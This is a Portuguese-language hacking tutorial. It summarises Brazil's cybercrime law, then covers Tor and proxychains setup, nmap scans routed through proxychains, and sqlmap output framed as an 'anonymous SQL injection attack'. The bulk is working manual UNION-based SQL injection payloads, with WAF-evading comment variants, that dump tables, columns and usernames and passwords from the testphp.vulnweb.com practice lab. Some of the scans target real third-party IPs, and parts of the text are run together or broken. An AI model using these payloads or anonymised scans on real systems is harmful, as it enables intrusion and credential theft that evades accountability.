Apelidada de Lei Carolina Dieckmann, a Lei dos Crimes Cibernéticos (12.737/2012)
tipifica como crimes infrações relacionadas ao meio eletrônico, como invadir computado-
res, violar dados de usuários ou "derrubar" sites.
O projeto que deu origem à lei (PLC 35/2012) foi elaborado na época em que fotos ínti-
mas da atriz Carolina Dieckmann foram copiadas de seu computador e espalhadas pela rede
mundial de computadores. O texto era reividicado pelo sistema financeiro, dada a quan-
tidade de golpes aplicados pela internet.
Entrou em vigor no dia 02/04/2013
Invasão de dispositivo informático:
Pode dar uma punição de prisão que via de 3 meses à um ano, além de multa.
Obter pela invasão conteúdo de “comunicações eletrônicas privadas, segredos comerciais
ou industriais, informações sigilosas”:
Pena de 6 meses à 2 anos de prisão, além da multa. O mesmo ocorre se o delito envolver
a divulgação, comercialização ou transmissão a terceiros, por meio de venda ou repasse
gratuito, do material obtido com a invasão.
A lei prevê ainda o aumento das penas de um sexto a um terço se a invasão causar pre-
juízo econômico e de um a dois terços “se houver divulgação, comercialização ou trans-
missão a terceiro, a qualquer título, dos dados ou informações obtidos”.
As penas também poderão ser aumentadas de um terço à metade se o crime for praticado
contra o presidente da República, presidentes do Supremo Tribunal Federal, da Câmara,
do Senado, de assembleias e câmaras legislativas, de câmaras municipais ou dirigentes
máximos “da administração direta e indireta federal, estadual, municipal ou do Distrito
Federal”.
02 - Proxychains
O Tor é um software livre e de código aberto para proteger o anonimato pessoal ao
navegar a Internet e atividades online, protegendo contra a censura e protegendo a
privacidade pessoal. A maioria das distribuições GNU/Linux disponibilizam pacotes do
Tor, embora haja versões para diferentes sistemas operacionais, tais como Windows e
Mac OS.
A rede Tor é uma rede de túneis http (com tls) sobrejacente à Internet, onde os
roteadores da rede são computadores de usuários comuns rodando um programa e com acesso
web (apenas). O objetivo principal do projeto é garantir o anonimato do usuário que
está acessando a web.
O Tor-cliente é um programa que deve ser instalado no computador e que funciona como um
proxy socks 5 para este. É fornecido um bind, geralmente na porta 9050 local da máquina.
Em seguida, os programas devem ser configurados para usar um servidor proxy socks 5 e
apontados para o endereço localhost (127.0.0.1).
Siga os passos a seguinte para instalarmos e configurarmos:
Install tor from the respository because there is always updated.
Copie e cole as duas linhas abaixo no terminal:
echo 'deb https://deb.torproject.org/torproject.org stretch main
deb-src https://deb.torproject.org/torproject.org stretch main' > /etc/apt/sources.list.d/tor.list
Then, download the Tor Project package signing key and import it into your APT keyring.
wget -O- 'https://pgp.mit.edu/pks/lookup?op=get&search=0xA3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89' | sudo apt-key add -
A linha acima é a mesma que esta abaixo, apenas quebrei para melhor visualização.
wget -O- 'https://pgp.mit.edu/pks/lookup?op=
get&search=0xA3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89' | sudo apt-key add -
-------
apt-get update apt-get install tor torsocks polipo privoxy proxychains
-------
tor &
Mar 15 14:22:56.060 [notice] Tor 0.2.9.9 (git-1d8323c042800718) running on Linux with Libevent 2.0.21-stable, OpenSSL 1.1.0c and Zlib 1.2.8.
Mar 15 14:22:56.061 [notice] Tor can't help you if you use it wrong! Learn how to be safe at https://www.torproject.org/download/download#warning
Mar 15 14:22:56.062 [notice] Read configuration file "/etc/tor/torrc".
Mar 15 14:22:56.069 [notice] Opening Socks listener on 127.0.0.1:9050
Mar 15 14:22:56.000 [notice] Parsing GEOIP IPv4 file /usr/share/tor/geoip.
Mar 15 14:22:56.000 [notice] Parsing GEOIP IPv6 file /usr/share/tor/geoip6.
Mar 15 14:22:56.000 [warn] You are running Tor as root. You don't need to, and you probably shouldn't.
Mar 15 14:22:56.000 [notice] Bootstrapped 0%: Starting
Mar 15 14:22:57.000 [notice] Bootstrapped 5%: Connecting to directory server
Mar 15 14:22:57.000 [notice] Bootstrapped 10%: Finishing handshake with directory server
Mar 15 14:22:57.000 [notice] Bootstrapped 15%: Establishing an encrypted directory connection
Mar 15 14:22:58.000 [notice] Bootstrapped 20%: Asking for networkstatus consensus
Mar 15 14:22:58.000 [notice] Bootstrapped 25%: Loading networkstatus consensus
Mar 15 14:22:59.000 [notice] I learned some more directory information, but not enough to build a circuit: We have no usable consensus.
Mar 15 14:23:00.000 [notice] Bootstrapped 40%: Loading authority key certs
Mar 15 14:23:00.000 [notice] Bootstrapped 45%: Asking for relay descriptors
Mar 15 14:23:00.000 [notice] I learned some more directory information, but not enough to build a circuit: We need more microdescriptors: we have 0/7344, and can only build 0% of likely paths. (We have 0% of guards bw, 0% of midpoint bw, and 0% of exit bw = 0% of path bw.)
Mar 15 14:23:01.000 [notice] Bootstrapped 50%: Loading relay descriptors
Mar 15 14:23:03.000 [notice] Bootstrapped 55%: Loading relay descriptors
Mar 15 14:23:03.000 [notice] Bootstrapped 61%: Loading relay descriptors
Mar 15 14:23:03.000 [notice] Bootstrapped 70%: Loading relay descriptors
Mar 15 14:23:03.000 [notice] Bootstrapped 75%: Loading relay descriptors
Mar 15 14:23:04.000 [notice] Bootstrapped 80%: Connecting to the Tor network
Mar 15 14:23:05.000 [notice] Bootstrapped 90%: Establishing a Tor circuit
Mar 15 14:23:06.000 [notice] Tor has successfully opened a circuit. Looks like client functionality is working.
Mar 15 14:23:06.000 [notice] Bootstrapped 100%: Done
-------
tor --verify-config
Dec 10 11:29:52.237 [notice] Tor 0.3.4.9 (git-de9ea9f0dfc5ecae) running on Linux with Libevent 2.1.8-stable, OpenSSL 1.1.1a, Zlib 1.2.11, Liblzma 5.2.2, and Libzstd 1.3.5.
Dec 10 11:29:52.237 [notice] Tor can't help you if you use it wrong! Learn how to be safe at https://www.torproject.org/download/download#warning
Dec 10 11:29:52.238 [notice] Read configuration file "/etc/tor/torrc".
Dec 10 11:29:52.241 [warn] You are running Tor as root. You don't need to, and you probably shouldn't.
Configuration was valid
-------
tor -f /path/to/your/own/torrc
Dec 10 11:30:45.233 [notice] Tor 0.3.4.9 (git-de9ea9f0dfc5ecae) running on Linux with Libevent 2.1.8-stable, OpenSSL 1.1.1a, Zlib 1.2.11, Liblzma 5.2.2, and Libzstd 1.3.5.
Dec 10 11:30:45.233 [notice] Tor can't help you if you use it wrong! Learn how to be safe at https://www.torproject.org/download/download#warning
Dec 10 11:30:45.233 [warn] Unable to open configuration file "/path/to/your/own/torrc".
Dec 10 11:30:45.234 [err] Reading config failed--see warnings above.
-------
netstat -tanp | grep tor
tcp 0 0 127.0.0.1:9050 0.0.0.0:* LISTEN 9730/tor
tcp 0 0 192.168.2.199:52786 134.119.3.164:9001 ESTABLISHED 9730/tor
tcp 0 0 192.168.2.199:60570 163.172.185.132:443 ESTABLISHED 9730/tor
tcp 0 0 192.168.2.199:56166 82.196.12.245:443 ESTABLISHED 9730/tor
tcp 0 0 192.168.2.199:37466 139.59.210.164:443 ESTABLISHED 9730/tor
tcp 0 0 192.168.2.199:37472 198.96.155.3:5001 ESTABLISHED 9730/tor
tcp 0 0 192.168.2.199:48184 193.171.202.146:9001 ESTABLISHED 9730/tor
-------
netstat -antlp | grep LISTEN
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 830/sshd
tcp 0 0 127.0.0.1:9050 0.0.0.0:* LISTEN 3166/tor
tcp 0 0 127.0.0.1:8123 0.0.0.0:* LISTEN 2135/polipo
tcp6 0 0 :::22 :::* LISTEN 830/sshd
-------
netstat -tanp | grep tor
tcp 0 0 127.0.0.1:9050 0.0.0.0:* LISTEN 3166/tor
tcp 0 0 192.168.142.129:49378 193.70.43.76:9001 ESTABLISHED 3166/tor
tcp 0 0 192.168.142.129:36678 194.88.105.97:443 ESTABLISHED 3166/tor
tcp 0 0 192.168.142.129:44512 144.76.236.14:443 ESTABLISHED 3166/tor
tcp 0 0 192.168.142.129:49972 185.100.86.128:9001 ESTABLISHED 3166/tor
tcp 0 0 192.168.142.129:50070 176.10.104.240:443 ESTABLISHED 3166/tor
-------
nano /etc/proxychains.conf
dynamic_chain
strict_chain
random_chain
proxy_dns
tcp_read_time_out 15000
tcp_connect_time_out 8000
socks4 127.0.0.1 9050
socks5 127.0.0.1 9050
ctrl + x + y + enter ( salvar e sair do arquivo )
-------
service tor restart
-------
service tor status
● tor.service - Anonymizing overlay network for TCP (multi-instance-master)
Loaded: loaded (/lib/systemd/system/tor.service; disabled; vendor preset: disabled)
Active: active (exited) since Sat 2018-12-01 11:50:09 EST; 2min 4s ago
Process: 2068 ExecStart=/bin/true (code=exited, status=0/SUCCESS)
Main PID: 2068 (code=exited, status=0/SUCCESS)
Dec 01 11:50:09 kali systemd[1]: Starting Anonymizing overlay network for TCP (multi-instance-master)...
Dec 01 11:50:09 kali systemd[1]: Started Anonymizing overlay network for TCP (multi-instance-master).
-------
Parando processo.
service privoxy stop && service tor stop
-------
Para permacer anonimo inicie os processos abaixo. service privoxy start && service tor start
-------
Atualizando sistema.
apt-get update
-------
Mostrando status do tor.
service tor status
tor.service - LSB: Starts The Onion Router daemon processes
Loaded: loaded (/etc/init.d/tor)
Active: active (running) since Mon 2016-06-13 09:21:08 EDT; 37min ago
Process: 1859 ExecStop=/etc/init.d/tor stop (code=exited, status=0/SUCCESS)
Process: 1870 ExecStart=/etc/init.d/tor start (code=exited, status=0/SUCCESS)
CGroup: /system.slice/tor.service
1881 /usr/bin/tor --defaults-torrc /usr/share/tor/tor-service-defaults-torrc --hush
Jun 13 09:21:08 kali tor[1870]: Starting tor daemon...done.
-------
Verificando.
netstat -ant | grep 8118
tcp 0 0 127.0.0.1:8118 0.0.0.0:* LISTEN tcp6 0 0 ::1:8118 :::* LISTEN
-------
netstat -na | grep 9050
tcp 0 0 127.0.0.1:9050 0.0.0.0:* LISTEN
-------
netstat -tanp | grep tor
tcp 0 0 127.0.0.1:9050 0.0.0.0:* LISTEN 1881/tor
tcp 0 0 192.168.1.102:38764 91.109.29.120:443 ESTABLISHED 1881/tor
-------
tail -f /var/log/tor/log Jun 13 16:50:10.000 [notice] Parsing GEOIP IPv4 file /usr/share/tor/geoip. Jun 13 16:50:10.000 [notice] Parsing GEOIP IPv6 file /usr/share/tor/geoip6. Jun 13 16:50:10.000 [notice] Bootstrapped 0%: Starting Jun 13 16:50:10.000 [notice] Bootstrapped 5%: Connecting to directory server Jun 13 16:50:10.000 [notice] We now have enough directory information to build circuits. Jun 13 16:50:10.000 [notice] Bootstrapped 80%: Connecting to the Tor network Jun 13 16:50:11.000 [notice] Bootstrapped 85%: Finishing handshake with first hop Jun 13 16:50:11.000 [notice] Bootstrapped 90%: Establishing a Tor circuit Jun 13 16:50:13.000 [notice] Tor has successfully opened a circuit.
Looks like client functionality is working. Jun 13 16:50:13.000 [notice] Bootstrapped 100%: Done
-------
tor Jun 13 16:45:51.026 [notice] Tor v0.2.5.12 (git-3731dd5c3071dcba) running on Linux with
Libevent 2.0.21-stable, OpenSSL 1.0.1k and Zlib 1.2.8. Jun 13 16:45:51.026 [notice] Tor can't help you if you use it wrong! Learn how to be
safe at https://www.torproject.org/download/download#warning Jun 13 16:45:51.027 [notice] Read configuration file "/etc/tor/torrc". Jun 13 16:45:51.029 [notice] Opening Socks listener on 127.0.0.1:9050 Jun 13 16:45:51.029 [warn] Could not bind to 127.0.0.1:9050: Address already in use.
Is Tor already running? Jun 13 16:45:51.029 [notice] Opening DNS listener on 127.0.0.1:53 Jun 13 16:45:51.029 [notice] Closing partially-constructed DNS listener on 127.0.0.1:53 Jun 13 16:45:51.029 [warn] Failed to parse/validate config:
Failed to bind one of the listener ports. Jun 13 16:45:51.030 [err] Reading config failed--see warnings above.
-------
tor --verify-config Jun 13 17:02:51.335 [notice] Tor v0.2.5.12 (git-3731dd5c3071dcba) running on Linux
with Libevent 2.0.21-stable, OpenSSL 1.0.1k and Zlib 1.2.8. Jun 13 17:02:51.336 [notice] Tor can't help you if you use it wrong!
Learn how to be safe at https://www.torproject.org/download/download#warning Jun 13 17:02:51.336 [notice] Read configuration file "/etc/tor/torrc". Jun 13 17:02:51.339 [warn] You are running Tor as root. You don't need to, and
you probably shouldn't.Configuration was valid
-------
tor -f /path/to/your/own/torrc Jun 13 17:04:41.936 [notice] Tor v0.2.5.12 (git-3731dd5c3071dcba) running on Linux
with Libevent 2.0.21-stable, OpenSSL 1.0.1k and Zlib 1.2.8. Jun 13 17:04:41.936 [notice] Tor can't help you if you use it wrong! Learn how to
be safe at https://www.torproject.org/download/download#warning Jun 13 17:04:41.936 [warn] Unable to open configuration file "/path/to/your/own/torrc". Jun 13 17:04:41.936 [err] Reading config failed--see warnings above.
-------
Vamos verificar qual é o ip do nosso servidor.
export http_proxy="http://localhost:8118"
-------
curl ipecho.net/plain ; echo 198.50.200.135
-------
Vamos ver de onde é este ip.
whois 198.50.200.135
#
# ARIN WHOIS data and services are subject to the Terms of Use
# available at: https://www.arin.net/whois_tou.html
#
# If you see inaccuracies in the results, please report at
# https://www.arin.net/public/whoisinaccuracy/index.xhtml
#
NetRange: 198.50.128.0 - 198.50.255.255
CIDR: 198.50.128.0/17
NetName: OVH-ARIN-6
NetHandle: NET-198-50-128-0-1
Parent: NET198 (NET-198-0-0-0-0)
NetType: Direct Allocation
OriginAS: AS16276
Organization: OVH Hosting, Inc. (HO-2)
RegDate: 2013-03-07
Updated: 2013-03-07
Ref: https://whois.arin.net/rest/net/NET-198-50-128-0-1
OrgName: OVH Hosting, Inc.
OrgId: HO-2
Address: 800-1801 McGill College
City: Montreal
StateProv: QC
PostalCode: H3A 2N4
Country: CA
RegDate: 2011-06-22
Updated: 2016-03-25
Ref: https://whois.arin.net/rest/org/HO-2
-------
Usando proxychains com nmap.
proxychains nmap -sS ip_x
-------
proxychains nmap -sT -PN -n -sV -p 80,443,21,22 ip_x
-------
proxychains nmap -Pn -sT -n -sV -p 21,22,23,53,80,110,139,143,443 ip_x
-------
nmap -Pn -sT -p 80,443,21,22,23 80.14.163.161
Starting Nmap 7.00 ( https://nmap.org ) at 2016-06-13 15:41 EDT
Nmap scan report for LStLambert-656-1-112-161.w80-14.abo.wanadoo.fr (80.14.163.161)
Host is up.
PORT STATE SERVICE
21/tcp filtered ftp
22/tcp filtered ssh
23/tcp filtered telnet
80/tcp filtered http
443/tcp filtered https
Nmap done: 1 IP address (1 host up) scanned in 3.45 seconds
-------
proxychains nmap -sV -Pn -p80,22,135 8.8.8.8
ProxyChains-3.1 (http://proxychains.sf.net)
Starting Nmap 7.00 ( https://nmap.org ) at 2016-06-13 14:14 EDT
Nmap scan report for google-public-dns-a.google.com (8.8.8.8)
Host is up (0.038s latency).
PORT STATE SERVICE VERSION
22/tcp filtered ssh
80/tcp filtered http
135/tcp filtered msrpc
-------
netstat -plant
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 1215/sshd
tcp 0 0 127.0.0.1:9050 0.0.0.0:* LISTEN 1881/tor
tcp 0 0 192.168.1.102:38814 91.109.29.120:443 ESTABLISHED 1881/tor
tcp 0 252 192.168.1.102:22 192.168.1.100:50185 ESTABLISHED 1536/1
tcp6 0 0 ::1:8118 :::* LISTEN 1854/privoxy
tcp6 0 0 :::22 :::* LISTEN 1215/sshd
-------
O ip acima é do Kali = 192.168.1.102
Verificando ip..
whois 91.109.29.120 | grep address
address: Kleyer Strasse 79 / Tor 13 address: 60326 address: Frankfurt address: GERMANY address: Kleyerstrasse 79 / Tor 13 address: 60326 Frankfurt am Main address: Germany
-------
Vamos usar proxychains com sqlmap para efetuar ataque anônimo de SQL Injection.
proxychains sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1"
--flush-session --time-sec=5 --tor-type=socks5 --tor-port=9050
ProxyChains-3.1 (http://proxychains.sf.net)
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-201603300a89}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable local,
state and federal laws. Developers assume no liability and are not responsible for any
misuse or damage caused by this program
[*] starting at 14:26:21
|DNS-request| testphp.vulnweb.com
|S-chain|-<>-127.0.0.1:9050-<><>-4.2.2.2:53-<><>-OK
|DNS-response| testphp.vulnweb.com is 176.28.50.165
[14:26:22] [INFO] testing connection to the target URL
|DNS-request| testphp.vulnweb.com
|S-chain|-<>-127.0.0.1:9050-<><>-4.2.2.2:53-<><>-OK
|DNS-response| testphp.vulnweb.com is 176.28.50.165
|S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-|S-chain|-<>-127.0.0.1:9050-<><>-
176.28.50.165:80-<><>-OK<><>-OK
[14:26:25] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
<><>-OK
[14:26:26] [INFO] testing if the target URL is stable<><>-OK
[14:26:26] [INFO] target URL is stable8.50.165:80-
[14:26:26] [INFO] testing if GET parameter 'artist' is dynamic <><>-OK
[14:26:27] [INFO] confirming that GET parameter 'artist' is dynamic <><>-OK
[14:26:28] [INFO] GET parameter 'artist' is dynamic <><>-OK
[14:26:29] [INFO] heuristic (basic) test shows that GET parameter 'artist'
might be injectable (possible DBMS: 'MySQL')<><>-OK
[14:26:30] [INFO] testing for SQL injection on GET parameter 'artist'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific
for other DBMSes? [Y/n] <><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK y
for the remaining tests, do you want to include all tests for 'MySQL' extending
provided level (1) and risk (1) values? [Y/n] y
[14:26:43] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
|S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK
[14:26:46] [INFO] GET parameter 'artist' seems to be 'AND boolean-based blind -
WHERE or HAVING clause' injectable
[14:26:46] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause' <><>-OK
[14:26:49] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause'<><>-OK
[14:26:50] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause (EXTRACTVALUE)' <><>-OK
[14:26:51] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause (EXTRACTVALUE)' <><>-OK
[14:26:52] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause (UPDATEXML)' <><>-OK
[14:26:52] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause (UPDATEXML)' <><>-OK
[14:26:53] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause (EXP)' <><>-OK
[14:26:54] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (EXP)'
<><>-OK
[14:26:54] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause (BIGINT UNSIGNED)'<><>-OK
[14:26:55] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (BIGINT
UNSIGNED)' <><>-OK
[14:26:56] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause' <><>-OK
[14:26:56] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE, HAVING clause'<><>-OK
[14:26:57] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause' <><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK
[14:26:58] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
<><>-OK
[14:26:59] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' <><>-OK
[14:26:59] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
<><>-OK
[14:27:00] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
<><>-OK
[14:27:01] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)' <><>-OK
[14:27:02] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace BIGINT UNSIGNED)
' <><>-OK
[14:27:02] [INFO] testing 'MySQL inline queries'0-<><>-OK
[14:27:03] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' <><>-OK
[14:27:04] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT)' <><>-OK
[14:27:05] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)' <><>-OK
[14:27:06] [INFO] testing 'MySQL > 5.0.11 stacked queries' <><>-OK
[14:27:06] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
<><>-OK
[14:27:07] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)' <><>-OK
[14:27:08] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' <><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK
[14:27:20] [INFO] GET parameter 'artist' seems to be 'MySQL >= 5.0.12 AND time-based
blind (SELECT)' injectable
[14:27:20] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[14:27:20] [INFO] automatically extending ranges for UNION query injection technique
tests as there is at least one other (potential) technique found
|S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK
[14:27:21] [INFO] ORDER BY technique seems to be usable. This should reduce the time
needed to find the right number of query columns. Automatically extending the range
for current UNION query injection technique test <><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK
[14:27:23] [INFO] target URL appears to have 3 columns in query<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK
[14:27:29] [INFO] GET parameter 'artist' is 'Generic UNION query (NULL) - 1 to 20
columns' injectable <><>-OK
GET parameter 'artist' is vulnerable. Do you want to keep testing the
others (if any)? [y/N] <><>-OK n
sqlmap identified the following injection point(s) with a total of 48 HTTP(s) requests:
---
Parameter: artist (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: artist=1 AND 9518=9518
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: artist=1 AND (SELECT * FROM (SELECT(SLEEP(5)))NsJj)
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: artist=-7658 UNION ALL SELECT NULL,NULL,CONCAT(0x7162706a71,
0x54754c5165526665574370556d6777466a7541764c6d7643505265597a507274585973536a476359,
0x7178627671)-- -
---
[14:32:37] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL 5.0.12
[14:32:37] [INFO] fetched data logged to text files under
'/root/.sqlmap/output/testphp.vulnweb.com'
[*] shutting down at 14:32:37
03 - FireFox add-ons
Tools you should have in your computer.
The Five Greatest Firefox Tools for Hacking!
Here is a list of the greatest Firefox add-ons for Hacking:
1. Hackbar – Execute Commands like SQL Injection, XSS and more…
2. Live HTTP Headers – Capture all (HEADERS) of a Page (Used when uploading a shell….)
3. SQL Inject Me – SQL Injection Commands and Automatations.
4. Firebug – Edit a Website’s source code.
5. Temper Data – Watch the data that your computer sends to a website and the data
the website sends to you.
6. Tor Brower - Download and install Tor.
04 - Tor Browser + HackBar
Why to use Tor Browser?
The Tor software protects you by bouncing your communications around a distributed
network of relays run by volunteers all around the world: it prevents somebody watching
your Internet connection from learning what sites you visit, it prevents the sites you
visit from learning your physical location, and it lets you access sites which are
blocked.
Download Tor Browser: https://www.torproject.org/download/download.html.en
The Tor version is 4.5.3 ( older ), this way we are able to use the HackBar.
Newer version do not allow the hackbar.
HackBar is a Firefox extension for penetration testers. Hackbar extends the address bar
of Firefox and thus provides enough space for long injection URLs during penetration
testing.
Hackbar also has some additional features including the ability to perform encryption,
encoding, decryption, POST data manipulation, inject code generation etc.
This toolbar will help you in testing sql injections, XSS holes and site security.
It is NOT a tool for executing standard exploits and it will NOT teach you how to hack
a site.
Its main purpose is to help a developer do security audits on his code. If you know
what your doing, this toolbar will help you do it faster.
If you want to learn to find security holes, you can also use this toolbar, but you
will probably also need a book, and a lot of google.
Example using hackbar, notice it has many options ( tools ) ...
Add on "anonymox" to browse websites anonymously.
05 - Laboratorio Online
Online labs.
06 - Manual Injection - example 1
Para testarmos possíveis vulnerabilidades de Sql Injection temos algumas ferramentas
que verificam se o banco de dados está ou não vulnerável.
Para este aprendizado usaremos o laboratório online abaixo criado para tal finalidade:
http://testphp.vulnweb.com
Vamos começar clicando abaixo em artists
Clique no primeiro registro onde aponta a setinha vermelha.
http://testphp.vulnweb.com/artists.php
Veja na imagem abaixo o registro foi selecionado.
http://testphp.vulnweb.com/artists.php?artist=1
Agora vamos adicioar um apostrofe simples logo apos o codigo 1 para detectarmos se
nosso alvo possui falha de SQL Injection ( 1' )
http://testphp.vulnweb.com/artists.php?artist=1'
O erro abaixo indica que esta url esta vulneravel.
Agora vamos usar order by para descobrirmos o número das tabelas.
Vá acrescentando os números sequencialmente, 1,2,3,4,5... até o erro aparecer.
Quando o erro aparecer, então significa que o número anterior é o número total de
tabelas no banco de dados atualda página.
Na url digite a linha abaixo:
http://testphp.vulnweb.com/artists.php?artist=1 order by 1,2,3,4
Descobrindo a versao do sistema.
Na linha da url digite a linha abaixo:
http://testphp.vulnweb.com/artists.php?artist=100 union all select 1,2,version()
Descobrindo o usuario.
http://testphp.vulnweb.com/artists.php?artist=100 union all select 1,2,user()
Agora vamos identificar onde estão as tabelas.
É importante setar um ID que não existe, assim ele irá identificar as tabelas com seus
números correspondentes, neste caso deduzindo, supondo que seja 100 ...
http://testphp.vulnweb.com/artists.php?artist=100union all select 1,2,3
Veja abaixo, coluna 3 e vuneravel.
Url abaixo e uma unica linha:
http://testphp.vulnweb.com/artists.php?artist=100 union all select 1,2,
group_concat(table_name) from information_schema.tables
Acima as tabelas foram listadas horizontalmente, abaixo veremos como listar de forma
vertical.
Para listar as tabelas em uma unica coluna teremos que converter <br> para hexadecimal
e diante do hexa precisaremos adicionar 0x <br> = 0x3c62723e
Para converter <br> para hexadecimal use o link abaixo:
http://online-toolz.com/tools/text-hex-convertor.php
Diante no valor hexa adicione 0x = 0x3c62723e
Vamos listar as tabelas verticalmente.
Digite a linha abaixo e uma única linha:
http://testphp.vulnweb.com/artists.php?artist=100 union all select 1,2,
group_concat(table_name,0x3c62723e) from information_schema.tables
Vamos listar todos as colunas da tabela artists.
Digite a linha abaixo e uma única linha:
http://testphp.vulnweb.com/artists.php?artist=100 union all select 1,2,
group_concat(table_name,0x3c62723e) from information_schema.tables
where table_schema=database()
Vamos listar todos os campos da tabela artists.
Digite a linha abaixo e uma única linha:
http://testphp.vulnweb.com/artists.php?artist=100 union all select 1,2,
group_concat(column_name) from information_schema.columns where table_name='users'
No link abaixo converteremos os dois pontos ( : ) para 0x3ahttp://www.rapidtables.com/convert/number/hex-to-ascii.htm
Com as colunas selecionadas, iremos efetuar a apresentação dos dados encontrados nas
colunas uname e pass da tabela users
Digite a linha abaixo e uma única linha:
http://testphp.vulnweb.com/artists.php?artist=100 union all select 1,2,
concat(uname,0x3a,pass) from users
Login : test
Password: test
07 - Some more manual injection command examples
Digite a linha abaixo e uma única linha:
http://testphp.vulnweb.com/artists.php?artist=100
union select 1,2,concat('Versao ===> ',' :: ',version())--
----------------------------------------------
Digite a linha abaixo e uma única linha:
http://testphp.vulnweb.com/artists.php?artist=100
union select 1,2,(select+count(column_name) from information_schema.columns)
----------------------------------------------
Digite a linha abaixo e uma única linha:
http://testphp.vulnweb.com/artists.php?artist=100
union select 1,2,(select count(table_name) from information_schema.tables)
http://testphp.vulnweb.com/artists.php?artist=100
union select 1,2,CONCAT(table_name,0x3e,GROUP_CONCAT(column_name))
FROM information_schema.columns WHERE table_schema=database()
GROUP BY table_name LIMIT 0,1
http://testphp.vulnweb.com/artists.php?artist=100
/*!50000uNiOn*/ /*!50000select*/ all 1,2,/*!50000 group_concat(table_name)*/
/*!50000from*/ information_schema.tables where table_schema=database()
http://testphp.vulnweb.com/artists.php?artist=100 /*!50000uNiOn*/
/*!50000select*/all 1,2,/*!50000 gRoUp_cOnCat(table_name,0x3c62723e)*/ /*!50000
from*/ information_schema.tables where table_schema=database()
http://testphp.vulnweb.com/artists.php?artist=100
union select 1,2,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)
where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)
Vuln column: 3http://testphp.vulnweb.com/artists.php?artist=-1
/*!50000union*/ /*!50000select*/ 1,2,database()
http://testphp.vulnweb.com/artists.php?artist=-1
/*!50000union*/ /*!50000select*/ 1,2,user()http://testphp.vulnweb.com/artists.php?artist=-1
